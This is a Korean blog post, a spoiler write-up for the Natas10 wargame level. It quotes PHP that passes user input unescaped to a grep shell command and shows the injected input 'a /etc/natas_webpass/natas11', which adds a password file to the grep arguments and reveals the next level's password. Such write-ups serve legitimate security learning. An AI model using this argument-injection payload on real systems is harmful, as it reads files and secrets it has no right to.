노루발 공작소 - (스포일러) Natas10 풀이

노루발의 개인 게시판

글 수 36

(스포일러) Natas10 풀이

노루발

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

이번에는 ; | & 문자를 사용하지 않고 /etc/natas_webpass/natas11의 내용을 확인하여야 한다.

쿼리에 a /etc/natas_webpass/natas11 를 입력하면 아래와 같은 명령어가 실행될 것이다:

grep -i a /etc/natas_webpass/natas11 dictionary.txt

a /etc/natas_webpass/natas11

b /etc/natas_webpass/natas11

c /etc/natas_webpass/natas11

...

의 순서대로 쿼리를 보내면 언젠가는 natas11의 내용을 확인할 수 있지 않을까?

결국 c /etc/natas_webpass/natas11 쿼리가 작동하여 natas11의 비밀번호를 얻을 수 있었다.

이 게시물을

분류 :: 망한거

조회 수 :: 13
등록일 :: 2020.03.07; 00:06:05 (*.47.15.90)

엮인글 :

게시글 주소 :: https://hondoom.com/zbxe/index.php?mid=noru&document_srl=818052

파일 첨부

여기에 파일을 끌어 놓거나 파일 첨부 버튼을 클릭하세요.

파일 크기 제한 : 0MB (허용 확장자 : *.*)

0개 첨부 됨 ( / )

옵션 :: 비밀글 기능

글쓴이 :

비밀번호 :

List of Articles

번호	제목	글쓴이	날짜	조회 수
36	망한거 (스포일러) Natas24 풀이	노루발	2020-03-19	48
35	망한거 (스포일러) Natas24 풀이	노루발	2020-03-17	19
34	망한거 (스포일러) Natas23 풀이	노루발	2020-03-13	16
33	망한거 (스포일러) Natas22 풀이	노루발	2020-03-13	10
32	망한거 (스포일러) Natas21 풀이	노루발	2020-03-13	13
31	망한거 (스포일러) Natas20 풀이	노루발	2020-03-13	16
30	망한거 (스포일러) Natas19 풀이	노루발	2020-03-13	14
29	망한거 (스포일러) Natas18 풀이	노루발	2020-03-12	9
28	망한거 (스포일러) Natas17 풀이	노루발	2020-03-12	16
27	망한거 (스포일러) Natas16 풀이	노루발	2020-03-12	18
26	망한거 (스포일러) Natas15 풀이	노루발	2020-03-11	21
25	망한거 (스포일러) Natas14 풀이	노루발	2020-03-10	12
24	망한거 (스포일러) Natas13 풀이	노루발	2020-03-10	7
23	망한거 (스포일러) Natas12 풀이	노루발	2020-03-08	15
22	망한거 (스포일러) Natas11 풀이	노루발	2020-03-07	19
»	망한거 (스포일러) Natas10 풀이	노루발	2020-03-07	13
20	망한거 (스포일러) Natas9 풀이	노루발	2020-03-06	11
19	망한거 (스포일러) Natas8 풀이	노루발	2020-03-06	8
18	망한거 (스포일러) Natas7 풀이	노루발	2020-03-06	10
17	망한거 (스포일러) Natas6 풀이	노루발	2020-03-06	9

쓰기

첫 페이지 1 2 끝 페이지

로그인

(스포일러) Natas10 풀이